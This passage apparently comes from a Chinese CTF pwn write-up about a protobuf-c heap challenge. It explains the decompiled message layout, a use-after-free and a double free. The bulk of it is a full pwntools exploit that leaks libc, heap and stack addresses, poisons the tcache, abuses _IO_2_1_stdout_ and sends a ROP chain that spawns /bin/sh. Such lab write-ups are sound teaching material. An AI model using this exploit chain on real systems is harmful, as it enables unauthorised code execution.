    ProtobufCBinaryData whatcon; // +0x18: {size_t len; uint8_t *data;} — 16 bytes, one field
    int64_t whattodo;            // +0x28
    int64_t whatidx;             // +0x30
    int64_t whatsize;            // +0x38
    uint32_t whatsthis;          // +0x40 (4 bytes of tail padding bring sizeof to 0x48)
};
/*
 * Header embedded at the start of every generated message struct (the `base`
 * member of Heybro). 24 bytes on x86-64: pointer, padded 4-byte count, pointer.
 */
struct ProtobufCMessage {
    /** The descriptor for this message type. +0x00 */
    const ProtobufCMessageDescriptor *descriptor;
    /** The number of elements in `unknown_fields`. +0x08 */
    unsigned n_unknown_fields;
    /** The fields that weren't recognized by the parser. +0x10 */
    ProtobufCMessageUnknownField *unknown_fields;
};
/*
 * Representation of a `bytes` field: a length/pointer pair (16 bytes).
 * This is why a single bytes field shows up as two 8-byte arguments in the
 * decompiler output below.
 */
struct ProtobufCBinaryData {
    size_t len;    /**< Number of bytes in the `data` field. +0x00 */
    uint8_t *data; /**< Data bytes. +0x08 */
};
/*
 * Hex-Rays output: the handler is called with every member of Heybro spread
 * into separate arguments. The first two arguments are whatcon.len and
 * whatcon.data of the single `bytes` field, not two distinct fields.
 */
sub_1934(
*(_QWORD *)(heybro + 24),       /* whatcon.len  (Heybro + 0x18) */
*(_QWORD *)(heybro + 32),       /* whatcon.data (Heybro + 0x20) */
*(_QWORD *)(heybro + 40),       /* whattodo     (Heybro + 0x28) */
*(_QWORD *)(heybro + 48),       /* whatidx      (Heybro + 0x30) */
*(_QWORD *)(heybro + 56),       /* whatsize     (Heybro + 0x38) */
*(unsigned int *)(heybro + 64)); /* whatsthis   (Heybro + 0x40) */
bytes类型转化为C语言结构时会变成一个结构体ProtobufCBinaryData,里面存放长度len和内容指针data。IDA由于没有内置相关结构信息,把它当作两个独立的8字节成员解析,因此会产生message有6个字段的错觉;实际上前两个参数(heybro+24、heybro+32)是同一个bytes字段whatcon的len和data,后面四个才分别对应whattodo、whatidx、whatsize和whatsthis。
思路
add会检查索引,然后分配固定0x40大小的chunk,并把whatcon的内容拷贝进去;delete限制10次,会检查索引范围以及对应索引的chunk是否为空,但free之后指针没有清零;show限制3次,同样检查索引范围和chunk是否为空,只有在 whatsthis == 0xFF 和 whatsize == 48 两个条件都不满足时才会打印出chunk的内容(所以exp里的magic(idx,0,0,b'')就是show)。
由于free后不清零,存在double free和show after free(释放后读):后者用来泄露libc和堆地址,前者用来劫持tcache做任意地址写。
- add时候会先分配一个0x50和一个和data长度相同的chunk,这两个都是从unsortedbin中分的,然后先是将内容写到那个和data长度相同的chunk, 最后memcpy将datachunk写到分配得到的0x40的chunk,这里的话可以通过残留的libc泄露地址
- 泄露堆地址:由于memcpy必须写入内容,chunk里残留的堆地址会被覆盖,直接读没有用;把chunk free进tcache之后再show,读到的是tcache的next字段,在safe-linking下等于(chunk地址>>12),由此即可恢复堆地址(exp中的heap变量就是这个页号,用的时候再<<12)。
- 构造任意写:delete的次数限制刚好是10次,所以通过double free只能拿到一次任意写;但tcache_perthread_struct里还有很多其他大小的bin,把这一次写用在tcache的entries数组上,之后每次add分配"和data等长"的chunk时就会从被篡改的bin里取到我们指定的地址,从而得到多次任意写。栈地址则通过先任意写stdout再从libc里保存的栈指针泄露。
_IO_2_1_stdout_:把 _flags 设为 0xFBAD1800(exp中用的是 0xFBAD1887,两者都带 _IO_IS_APPENDING|_IO_CURRENTLY_PUTTING 且去掉了 _IO_NO_WRITES),然后把 _IO_read_ptr/_IO_read_end/_IO_read_base 三个指针写0,再把 _IO_write_base 和 _IO_write_ptr 设为要泄露的地址区间,libc下次刷新stdout时就会把 [_IO_write_base, _IO_write_ptr) 之间的内容原样输出。exp里把这个区间指向libc中保存栈指针的位置(libcbase+0x222200,按偏移推测是environ),从而泄露栈地址。
- malloc分配到tcachebin,然后再修改tcachebin,使得可以分配到栈上
exp
from pwn import *
import devicemsg_pb2
#context.log_level='debug'
# 64-bit Linux target: this fixes the word size that p64/u64 and the ROP helpers use.
context.update(arch='amd64', os='linux')
def add(idx,con):
    """Menu operation 1 (add): store the bytes `con` in slot `idx`.

    Builds a heybro message with whattodo=1 and sends it after the prompt.
    `p` is the module-level tube opened further down.
    """
    req = devicemsg_pb2.heybro()
    req.whattodo = 1
    req.whatidx = idx
    req.whatcon = con
    p.sendafter(b'WHAT DO YOU WANT?\n', req.SerializeToString())
def delete(idx):
    """Menu operation 2 (delete): free slot `idx`.

    Per the analysis above the binary does not NULL the slot afterwards,
    which is what the double free and the show-after-free leaks rely on.
    """
    req = devicemsg_pb2.heybro()
    req.whatidx = idx
    req.whattodo = 2
    p.sendafter(b'WHAT DO YOU WANT?\n', req.SerializeToString())
def magic(idx,thiss,size,con):
    """Menu operation 3 (show): print the content of slot `idx`.

    `thiss` and `size` feed whatsthis/whatsize; according to the writeup the
    content is only printed when neither whatsthis == 0xFF nor whatsize == 48
    holds, which is why every leak below passes zeros. `con` goes out as whatcon.
    """
    req = devicemsg_pb2.heybro()
    req.whatidx = idx
    req.whatsthis = thiss
    req.whatsize = size
    req.whatcon = con
    req.whattodo = 3
    p.sendafter(b'WHAT DO YOU WANT?\n', req.SerializeToString())
def exitt():
    """Menu operation 4 (exit). Not used by the exploit flow below; kept for completeness."""
    req = devicemsg_pb2.heybro()
    req.whattodo = 4
    p.sendafter(b'WHAT DO YOU WANT?\n', req.SerializeToString())
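#p=remote('8.147.129.121',15268)
p = process('./pwn')
libc = ELF('./libc.so.6')

# ---------------------------------------------------------------------------
# Hard-coded offsets. They are specific to the libc shipped with the challenge
# (the layout looks like Ubuntu 22.04 glibc 2.35 — confirm before reusing the
# script against another build).
# ---------------------------------------------------------------------------
LEAK_OFF = 0x21ac61      # residual arena pointer seen via show(); its low byte has
                         # already been clobbered by the b'a' written by add(),
                         # which is why the offset ends in 0x61 and not 0xe0
STDOUT_OFF = 0x21b780    # _IO_2_1_stdout_ (the payload writes _flags here)
ENVIRON_OFF = 0x222200   # presumably environ: a libc .bss slot holding a stack pointer — confirm
POP_RDI_OFF = 0x2a3e5    # pop rdi ; ret
RET_OFF = 0x29139        # ret, used to realign the stack before system()
TCACHE_TARGET_DELTA = -0x5000 + 0xe0  # (heap << 12) + this == the tcache entry slot we hijack — verify in gdb


def _check_offset(sym, off):
    """Warn (do not abort) when a hard-coded offset disagrees with the loaded libc's symbols."""
    if sym in libc.symbols and libc.symbols[sym] != off:
        log.warning('%s is at %#x in ./libc.so.6 but the exploit uses %#x' % (sym, libc.symbols[sym], off))


_check_offset('_IO_2_1_stdout_', STDOUT_OFF)
_check_offset('environ', ENVIRON_OFF)

# 1. libc leak: show() a chunk that still holds a stale arena pointer.
add(0, b'a')
add(1, b'a')
magic(0, 0, 0, b'')
p.recvuntil(b'Content:')
libcbase = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - LEAK_OFF
if libcbase & 0xfff:
    # A mis-parsed leak would turn every later write into a wild write; stop here.
    log.error('libc leak is not page-aligned: %#x (wrong libc or wrong LEAK_OFF?)' % libcbase)
log.info('libcbase = %#x' % libcbase)

# 2. heap leak: free the slots, then show() one of them — its first qword is the
#    tcache `next` field, which under safe-linking is (chunk address >> 12).
for i in range(9):
    add(i, b'a')
for i in range(8):
    delete(i)
magic(0, 0, 0, b'')
p.recvuntil(b'Content:')
heap = u64(p.recvline()[:-1].ljust(8, b'\x00')) + 1  # +1: page of the chunk whose next we poison (chunk 7), presumably — verify
log.info('heap page = %#x' % heap)
target = (heap << 12) + TCACHE_TARGET_DELTA

# 3. double free (slot 7 freed twice, slot 8 in between) and drain the tcache so
#    the next add hands back chunk 7 and lets us poison its mangled `next`.
delete(8)
delete(7)
for i in range(7):
    add(i, b'a')
#pause()
add(7, p64(target ^ heap))   # safe-linking: next = target ^ (address_of_next >> 12)
add(7, b'a')
add(7, b'a')                 # after these two the tcache head is `target`
# One allocation now lands on the tcache entry array; seed it so that the
# data-sized chunks allocated by the following add() calls come from chosen addresses.
stdout = libcbase + STDOUT_OFF
add(7, b'\x00' * 8 + p64(stdout - 0x90) + p64(0) + p64(target))

# 4. stack leak through _IO_2_1_stdout_ (not stderr): _flags = 0xfbad1887,
#    _IO_read_* = 0, and [_IO_write_base, _IO_write_ptr) covering the stack
#    pointer stored in libc so the next flush prints it.
stack_slot = libcbase + ENVIRON_OFF
payload = b'\x00' * 0x90 + p64(0xfbad1887) + p64(0) * 3 + p64(stack_slot) + p64(stack_slot + 8)
add(7, payload)
stack = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00'))
log.info('stack leak = %#x' % stack)

# 5. re-point the poisoned tcache entry at the saved return address area,
#    then write the ROP chain there with the next add().
add(7, p64(0) + p64(stack - 0x168) + b'\x00' * 0xd0)
#gdb.attach(p)
pop_rdi = libcbase + POP_RDI_OFF
ret = libcbase + RET_OFF
bin_sh = libcbase + next(libc.search(b'/bin/sh\x00'))
system = libcbase + libc.symbols['system']
rop = b'a' * 8 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
add(7, rop.ljust(0xc0, b'\x00'))
p.interactive()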